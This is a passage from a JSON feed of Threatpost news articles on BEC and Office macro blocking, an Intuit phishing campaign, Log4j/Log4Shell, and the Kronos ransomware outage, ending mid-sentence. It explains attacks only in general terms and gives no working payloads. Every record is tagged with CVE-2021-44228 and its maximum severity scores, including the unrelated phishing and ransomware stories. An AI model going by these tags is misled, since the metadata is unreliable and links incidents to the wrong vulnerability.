targets,\u201d he said.\n\nIndeed, BEC is a major threat that typically involves human error. The way it works is that an employee at a company receives an email with a malicious link or document and takes an action that can install malware on their computers. This can result in consequences from local data theft to giving threat actors access to the corporate network to advanced attack vectors such as ransomware.\n\nMicrosoft unveiled a timely yet unrelated step this week that could help mitigate the impact of, or even prevent, future BEC attacks: Namely, the company will soon begin blocking, by default, VBA macros obtained from the internet in five Office apps, as the company [revealed in a blog post](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) Monday.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft Principal Program Manager Kellie Eickmeyer wrote. \u201cA message bar will appear for users notifying them with a button to learn more.\u201d\n\nThis default setting \u201cis more secure and is expected to keep more users safe including home users and information workers in managed organizations,\u201d she added. Indeed, sending documents loaded with macros that immediately install malware on people\u2019s computers with one click is a popular tactic of email-based attacks.\n\nThe new default setting will apply to Microsoft Office on devices running Windows for Access, Excel, PowerPoint, Visio and Word. Microsoft will roll out the change first in a preview version of Office 2023, starting with its Current Channel update channel in early April 2022.\n\nLater, the change will be available in the other update channels, such as Current Channel, Monthly Enterprise Channel, and Semi-Annual Enterprise Channel. In the future Microsoft also will change the Office default setting for VBA macros in Office LTSC, Office 2021, Office 2019, Office 2016 and Office 2013, Eickmeyer added.\n\nThis move may make it more difficult to slip malware past corporate employees using BEC tactics. However, as one security professional noted, companies still must remain vigilant and take an \u201call hands on deck\u201d approach to both threat mitigation and response, given the evolving nature and increased occurrence of cyber-attacks that organizations face.\n\n\u201cAs the threat environment continues to change, proper and continuous diligence is required to ensure all cyber defensive tools and techniques are employed to protect your most precious data assets,\u201d observed Tom Garrubba, vice president at risk-management firm [Shared Assessments](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUY-2Flf1YfJi8Jl6Pa8fYnwMooXA0t7nRcGwuHZmhL1VNFMgZ7_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2Ec5EmRJ9V9NBrK7aLIAhF6196NdmcyMkxC1VH7FuP-2B9MgrfUoUGWizcYBWkO7YHK-2FSUvJvNf4hmd993Dye56pyq89HFwWZoHTuzoXanpznaaoSlcLfzlPiOUFNRXQsUtdLW6-2BFIvjy5oI3kpt8fOysQ-2BJJ7pNAMDmmGf2nc2TWwK5J4rfFBha96XAcFn5Tdh8idS0UjuT6a1Fel8Ug5x5WkloyV8fxoFRJXaTFLqD0L0IDktPIPckEiewFCmD6TiVprT0ERdmp5-2BqTF3UZ3I98-3D>)**, **in an email to Threatpost. \u201cContinuous intelligence, monitoring, and dialogue with critical partners and suppliers should be ongoing to ensure \u2018all is ready\u2019 in the event recovery is needed, and that additional support is available in the event something were to occur.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T14:14:59", "type": "threatpost", "title": "China Suspected of News Corp Cyberespionage Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-08T14:14:59", "id": "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "href": "https://threatpost.com/china-suspected-news-corp-cyberespionage/178277/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Just in time for tax season, Intuit is warning customers of a phishing campaign that threatens to close user accounts if they don\u2019t click on a malicious link.\n\nThe attacks on the accounting-software specialist that many people use for filing U.S. income tax forms comes as phishers overall are ramping up more creative and stealthy ways to trick users into installing malware or giving up personal data.\n\nIntuit posted a screenshot from a suspicious email customers reported receiving, which the company insists \u201cdid not come from Intuit,\u201d according to [a media statement](<https://security.intuit.com/security-notices>) posted Thursday.\n\nThe faux email, purporting to come from the Intuit Maintenance Team, informs the recipient that his or her account has been \u201ctemporarily disabled\u201d \u201cdue to inactivity\u201d and that it\u2019s \u201ccompulsory\u201d to restore access to the account within 24 hours.\n\n\u201cThis is a result of recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season,\u201d according to the email.\n\nThe email directs users to a link, https://proconnect[dot]intuit.com/Pro/Update, claiming it will immediately restore access to their accounts.\n\n## **Intuit: Resist the Bait**\n\nThough Intuit does not provide information on what happens if users click on the link, the company is warning customers that it is likely malicious and not to click on it nor on any attachment that is associated with the email.\n\nIf a customer already has followed the email\u2019s instructions and clicked on the link, Inuit recommends that users delete any resulting downloads immediately; scan their system using an up-to-date antivirus program; and change their passwords.\n\nOne security professional said he was not surprised to learn of such an engineered attack on Intuit and expects that more will come as we get deeper into tax season.\n\n\u201cThis is not an unusual way for cybercriminals to use to trick people into logging into their accounts on a fake website, allowing them to steal the user\u2019s credentials,\u201d observed Erich Kron, security awareness advocate at security awareness and training firm KnowBe4. \u201cThese kind of attacks are certain to ramp up during tax season, as we are seeing now.\u201d\n\n## **Phishing Attacks Get Smarter**\n\nIndeed, phishers have been escalating attacks with vigor lately, using more creative ways to both trick users into taking the bait as well as to hide their activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year.\n\nJust this week alone, security researchers have discovered two novel ways phishers are targeting victims. In one, Proofpoint researchers observed adversaries procuring and then using phishing kits that are focused on [bypassing multi-factor authentication (MFA)](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) methods, by stealing authentication tokens via man-in-the-middle (MiTM) attacks.\n\nThe other phishing campaign revealed this week described attackers [using an under-the-radar PowerPoint file](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) to hide malicious executables that can rewrite Windows registry settings \u2014 with the goal of ultimately taking over an end user\u2019s computer.\n\nOther recent phishing attacks aimed at stealing credentials found scammers using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) and leveraging [the \u201cComments\u201d feature of Google Docs](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>), respectively, to trick users into clicking on malicious links.\n\nWhile phishing has been around almost as long as people have been sending emails, it\u2019s a threat vector that will never get old, noted one security professional.\n\n\u201cPhishing continues to be a popular means of attack because it continues to work,\u201d Tim Erlin, vice president of strategy at cybersecurity firm Tripwire, wrote in an email to Threatpost. \u201cIt only takes one user to click in order for the phishing campaign to be effective for the attacker.\u201d\n\nIt also remains dangerous because credential-stealing from victims is often a gateway attack that provides cybercriminals a way to engage in further and more disruptive attacks, such as defrauding people of money in financial accounts or ransomware attacks on corporate networks.\n\nMoreover, it remains difficult for an organization to prevent phishing attacks from success because they merely require human error rather than any compromise of infrastructure that the organization controls, Erlin added.\n\n\u201cWhile we try to address phishing with technological solutions, the problem remains a primarily human one,\u201d he said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-04T13:28:01", "type": "threatpost", "title": "Attackers Target Intuit Users by Threatening to Cancel Tax Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-04T13:28:01", "id": "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "href": "https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T13:31:38", "description": "It\u2019s not my intention to be alarmist about the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)), known as Log4Shell, but this one is pretty bad. \n\nFirst of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the [most serious vulnerability](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>) she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times_ every minute._ The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.\n\nOK, maybe it is time for alarm.\n\nLog4j is open-source software from the Apache Software Foundation. [As explained by The Conversation](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>), this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j allows users of the software to specify custom code for formatting a log message. This feature also allows third-party servers to submit software code that can perform all kinds of actions \u2013 including malicious ones \u2013 on the targeted computer. The result of an exploit for the bug is that an attacker can control a targeted server remotely.\n\n## **Attackers Took Early Advantage**\n\nWithin weeks of discovery of the flaw in mid-December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.\n\nHow prevalent is Log4j in business systems? [Analysis by Wiz and Ernst & Young](<https://blog.wiz.io/10-days-later-enterprises-halfway-through-patching-log4shell/>) of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability. \n\n[Google researchers discovered](<https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j>) that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability\u2014an \u201cenormous\u201d amount by all standards of ecosystem impact. \n\nSo, yeah, that\u2019s pretty extensive presence of this vulnerability. As for the global impact, it\u2019s still too early to tell. Much will depend on how well organizations respond to the threat.\n\n## **Everyone Must Take Action**\n\nFor everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption. \n\nAs for the moral imperative, the Federal Trade Commission points out that [companies have a responsibility to take steps \u201cto reduce the likelihood of harm to consumers.\u201d](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) With the fallout from the Equifax breach still fresh in memory, the FTC warns that it \u201cintends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\u201d Not every company serves consumers, of course, but that shouldn\u2019t matter with regard to addressing this issue.\n\nCISA issued a list of [\u201cimmediate actions\u201d](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak. \n\nAfter that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack. \n\nIt\u2019s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.\n\n## **How Effective Are Your Security Tools?**\n\nSecurity tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn\u2019t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.\n\nEvery organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes. \n\nLog4Shell is a wake-up call for everyone. We shouldn\u2019t hit the snooze button until the next vulnerability comes around.\n\n_**Saryu Nayyar is CEO at [Gurucul](<https://gurucul.com/>). \n**_**_ \nEnjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:21:04", "type": "threatpost", "title": "The Log4j Vulnerability Puts Pressure on the Security World", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T20:21:04", "id": "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "href": "https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) [said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll was disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify the that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several attorney generals\u2019 offices, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug,\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploits as that spotted in Minecraft, as well as in cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes are [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. \u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but. well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Aka [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell ](<https://en.wikipedia.org/wiki/Shell_\\(computing\\)> \"Shell \\(computing\\)\" )present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n_\u201c_Organizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n``\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 <= Apache log4j <= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nVulnerability also depends on specific configurations. But there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings \u2013 CERT-NZ uses the example of 